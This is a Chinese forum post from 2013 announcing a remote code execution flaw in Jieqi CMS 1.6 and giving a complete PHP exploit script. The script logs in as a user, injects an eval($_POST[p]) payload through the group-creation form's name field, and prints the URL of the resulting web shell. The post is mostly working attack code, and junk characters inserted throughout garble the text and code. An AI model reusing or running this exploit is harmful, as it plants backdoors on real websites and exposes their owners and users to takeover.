杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。" v5 e: V* [# `0 f7 C5 D+ T: z
+ t: w! n6 G3 E$ B" r
6 N w. b, D$ @! l, g. f. T该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
2 R; ~. }# [2 X/ N 需要有一个能创建圈子的用户。. n- @) N! n8 P3 P+ I e
6 q" |& B4 |8 h<?php
2 B4 `$ x2 }. b Q+ @
7 E7 x* G; _6 M" }print_r('
4 i _* p" {/ c, A: H: V( U* H7 P! B+---------------------------------------------------------------------------+
! Y! R% _+ P$ U; M* ~/ e4 n3 |, HJieqi CMS V1.6 PHP Code Injection Exploit
( x1 m& z3 Q6 S7 Y8 uby flyh4t4 r0 w9 m$ g' i. v9 M4 q) @
mail: phpsec at hotmail dot com3 D0 p+ }+ n- ]& o: v- c
team: http://www.wolvez.org. T1 h- O6 V3 s$ |
+---------------------------------------------------------------------------+: r7 Z( }$ p6 \* l- @
'); /**8 _/ M" h# v) f. B
* works regardless of php.ini settings
/ |% i& v, U2 f. T1 n*/ if ($argc < 5) { print_r('
* p9 j( `- N; J- _) B+---------------------------------------------------------------------------+
$ G3 `0 ]( i; o( Y& xUsage: php '.$argv[0].' host path username( X; {: }- V( @# W: Q5 v" b0 l6 k
host: target server (ip/hostname)# W3 x% N, i- w" U& Y8 r: O; ]
path: path to jieqicms
2 L$ E2 W0 @% o, U, O: p- X# auasename: a username who can create group# _& F; O; I0 j a9 `
Example: ~/ s: T9 L% N4 F" \: p. ?" U
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
- x3 o3 m$ P$ u+ j% Y2 s0 `5 ^+---------------------------------------------------------------------------+
4 Q% r1 `9 z! ~. l* O! f* [/ l'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961( n0 l- j2 L: W" y6 y- s e$ N6 Z; f
Content-Disposition: form-data; name="gname"
4 B8 w, C. L3 h$ S! ` 7 ~" _7 }1 o3 d
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
: M* n" c2 W! _) P h. ?-----------------------------23281168279961
5 l8 Y8 l$ H* v- x! bContent-Disposition: form-data; name="gcatid"
; t" V2 Y' _: i" g# m # E6 L3 n2 a* O/ Z' E6 g
1) y x5 s3 _' d& {9 f
-----------------------------23281168279961
; Q+ q$ c+ p8 F; oContent-Disposition: form-data; name="gaudit"6 V7 ^* e; [) ^! e, b5 m6 `
- w5 W9 u2 \2 c; A
1( H$ K) I1 v V( Q5 E2 h
-----------------------------23281168279961
3 | E. l* Q' E5 g% e0 j2 B9 IContent-Disposition: form-data; name="gbrief"
- F+ l$ R$ s" S ! G+ q7 h5 Y) H- h: D
15 [7 w! d9 d- H! O
-----------------------------23281168279961--
3 H( \! R" n+ \) O4 Y/ q2 i% h! p'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
* D7 O: w4 r4 g' N5 S
0 I" M+ W/ l7 S8 U- ]9 Opreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对